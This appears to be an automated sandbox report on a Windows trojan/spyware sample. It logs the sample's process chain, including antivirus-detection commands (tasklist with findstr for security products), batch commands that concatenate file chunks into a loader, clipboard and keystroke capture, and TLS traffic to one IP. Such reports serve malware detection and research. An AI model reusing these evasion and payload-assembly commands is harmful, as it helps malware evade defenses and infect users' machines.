            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 64745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64745
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64748 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00406747 SetWindowsHookExW 00000002,Function_000075C3,00000000,000000000_2_00406747
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008CF286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_008CF286
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008CF4F1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_008CF4F1
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008CF286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_008CF286
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BA36F GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,12_2_008BA36F
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008E9C62 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_008E9C62
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C448D: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_008C448D
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B18E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_008B18E3
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BEF37 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_008BEF37
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00404E5F0_2_00404E5F
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041B8530_2_0041B853
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_004150AE0_2_004150AE
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_004161F10_2_004161F1
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00416A1D0_2_00416A1D
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_004183B00_2_004183B0
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041B4E10_2_0041B4E1
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041649B0_2_0041649B
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0040AD0B0_2_0040AD0B
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0040F5E40_2_0040F5E4
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00411D800_2_00411D80
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041B5BB0_2_0041B5BB
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00415E7F0_2_00415E7F
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_004167620_2_00416762
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041379E0_2_0041379E
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008581B012_2_008581B0
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0087228212_2_00872282
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0088A23E12_2_0088A23E
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0085E4CB12_2_0085E4CB
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0086C4DD12_2_0086C4DD
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008DC5CB12_2_008DC5CB
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0085869012_2_00858690
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C272F12_2_008C272F
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0088E85212_2_0088E852
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B899112_2_008B8991
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00886ABB12_2_00886ABB
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00858AF012_2_00858AF0
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0086CC3E12_2_0086CC3E
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0087CDF012_2_0087CDF0
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0085D08012_2_0085D080
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008E503312_2_008E5033
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_0088712912_2_00887129
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008716E412_2_008716E4
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00871A5612_2_00871A56
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00869BAD12_2_00869BAD
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00877B6B12_2_00877B6B
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00877D9A12_2_00877D9A
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00871D0012_2_00871D00
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00871FC712_2_00871FC7
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: String function: 00870D80 appears 45 times
            Source: 80441fcf.exeStatic PE information: invalid certificate
            Source: Cookbook.0.drStatic PE information: No import functions for PE file found
            Source: Cookbook.0.drStatic PE information: Data appended to the last section found
            Source: 80441fcf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/9@3/2
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00407280 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,lstrcpyW,lstrcpyW,lstrcpyW,LocalFree,0_2_00407280
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B17A1 AdjustTokenPrivileges,CloseHandle,12_2_008B17A1
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008B1DA5 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_008B1DA5
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008C593C SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,12_2_008C593C
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008BDAC1 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,12_2_008BDAC1
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_004027BC _wtol,SHGetSpecialFolderPathW,_wtol,CoCreateInstance,0_2_004027BC
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_00407483 SystemParametersInfoW,GetDC,GetDeviceCaps,MulDiv,ReleaseDC,GetModuleHandleW,FindResourceA,LoadResource,LockResource,DialogBoxIndirectParamW,0_2_00407483
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
            Source: C:\Users\user\Desktop\80441fcf.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit
            Source: 80441fcf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\80441fcf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeFile read: C:\Users\user\Desktop\80441fcf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\80441fcf.exe "C:\Users\user\Desktop\80441fcf.exe"
            Source: C:\Users\user\Desktop\80441fcf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\80441fcf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 5758
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Ink 5758\o
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif 5758\Apply.pif 5758\o
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
            Source: C:\Users\user\Desktop\80441fcf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 5758Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pifJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Ink 5758\oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif 5758\Apply.pif 5758\oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\80441fcf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: 80441fcf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdb source: 80441fcf.exe
            Source: Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdbt?= source: 80441fcf.exe
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00854E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00854E68
            Source: Cookbook.0.drStatic PE information: real checksum: 0xf5a21 should be: 0x427ba
            Source: 80441fcf.exeStatic PE information: real checksum: 0xf1ab1 should be: 0xf50ec
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041A84C push ecx; ret 0_2_0041A85C
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041ACD6 push ecx; ret 0_2_0041ACE9
            Source: C:\Users\user\Desktop\80441fcf.exeCode function: 0_2_0041A774 push eax; ret 0_2_0041A792
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_3_05AE9048 push ecx; retf 12_3_05AE904A
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_00870DC6 push ecx; ret 12_2_00870DD9

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifJump to dropped file
            Source: C:\Users\user\Desktop\80441fcf.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CookbookJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifJump to dropped file
            Source: C:\Users\user\Desktop\80441fcf.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CookbookJump to dropped file
